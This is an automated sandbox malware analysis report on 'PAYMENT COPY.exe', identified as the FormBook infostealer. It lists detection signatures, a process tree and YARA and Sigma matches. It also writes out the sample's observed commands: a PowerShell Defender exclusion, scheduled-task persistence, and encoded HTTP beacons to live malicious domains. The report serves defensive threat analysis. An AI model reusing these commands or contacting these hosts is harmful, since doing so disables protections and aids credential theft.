Edit tour

Windows Analysis Report
PAYMENT COPY.exe

Overview

General Information

Sample name:	PAYMENT COPY.exe
Analysis ID:	1447913
MD5:	a05649b0d742e857fc002ac0b7759512
SHA1:	84051af6ed4aec8f1209d5f7ead77f20b8bffc2b
SHA256:	94ad0e1f81c61142471ffd1cbc66caf209d43aa514702033728a51e672702d6c
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PAYMENT COPY.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: A05649B0D742E857FC002AC0B7759512)

powershell.exe (PID: 6944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6472 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PAYMENT COPY.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: A05649B0D742E857FC002AC0B7759512)

JBOkmqufMEGwlAXNwkIjNoQeH.exe (PID: 3784 cmdline: "C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

gpresult.exe (PID: 6960 cmdline: "C:\Windows\SysWOW64\gpresult.exe" MD5: 8201D5447D15345B8B1A7B9B1493EC85)

JBOkmqufMEGwlAXNwkIjNoQeH.exe (PID: 3192 cmdline: "C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5928 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

gpresult.exe (PID: 7004 cmdline: "C:\Windows\SysWOW64\gpresult.exe" MD5: 8201D5447D15345B8B1A7B9B1493EC85)

bQrgcvrrXfGN.exe (PID: 3472 cmdline: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe MD5: A05649B0D742E857FC002AC0B7759512)

schtasks.exe (PID: 6972 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bQrgcvrrXfGN.exe (PID: 7028 cmdline: "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe" MD5: A05649B0D742E857FC002AC0B7759512)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e473:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17bf2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f412:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18b91:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2817b6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x26af35:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2817b6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x26af35:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x66346a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x64cbe9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x66346a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x64cbe9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: bQrgcvrrXfGN.exe PID: 3472	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.PAYMENT COPY.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.PAYMENT COPY.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e473:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17bf2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.PAYMENT COPY.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.PAYMENT COPY.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d673:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16df2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT COPY.exe, ParentProcessId: 6764, ParentProcessName: PAYMENT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe", ProcessId: 6944, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe, ParentImage: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe, ParentProcessId: 3472, ParentProcessName: bQrgcvrrXfGN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp", ProcessId: 6972, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT COPY.exe, ParentProcessId: 6764, ParentProcessName: PAYMENT COPY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp", ProcessId: 7028, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT COPY.exe, ParentProcessId: 6764, ParentProcessName: PAYMENT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe", ProcessId: 6944, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT COPY.exe, ParentProcessId: 6764, ParentProcessName: PAYMENT COPY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp", ProcessId: 7028, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PAYMENT COPY.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.skinut-ves.ru/pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt	Avira URL Cloud: Label: malware
Source: http://www.drdavidglassman.com/rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt	Avira URL Cloud: Label: malware
Source: http://www.drdavidglassman.com/rydx/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Avira: detection malicious, Label: TR/Kryptik.amknq

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: PAYMENT COPY.exe	ReversingLabs: Detection: 91%
Source: PAYMENT COPY.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PAYMENT COPY.exe

Joe Sandbox ML: detected

Source: PAYMENT COPY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PAYMENT COPY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: gprslt.pdb source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946217821.0000000000758000.00000004.00000020.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 00000010.00000002.2716953032.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946708771.0000000000C5E000.00000002.00000001.01000000.0000000D.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758464507.0000000000C5E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2681627538.0000000004536000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2685430118.00000000046E5000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2711206320.0000000004B38000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2709187681.0000000004989000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004E7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, gpresult.exe, 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2681627538.0000000004536000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2685430118.00000000046E5000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2711206320.0000000004B38000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2709187681.0000000004989000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004E7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: gprslt.pdbGCTL source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946217821.0000000000758000.00000004.00000020.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 00000010.00000002.2716953032.0000000000D08000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\gpresult.exe

Code function: 13_2_0087C050 FindFirstFileW,FindNextFileW,FindClose,

13_2_0087C050

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 4x nop then jmp 06DB9778h	0_2_06DB981C
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 4x nop then jmp 07078A30h	10_2_07078AD4
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 4x nop then xor eax, eax	13_2_00869760
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 4x nop then pop edi	13_2_0086E380
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 4x nop then pop edi	13_2_0086E350

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 136.143.186.12 136.143.186.12

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt HTTP/1.1Host: www.skinut-ves.ruAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt HTTP/1.1Host: www.mediciconstanta.roAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt HTTP/1.1Host: www.celluslim.com.brAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
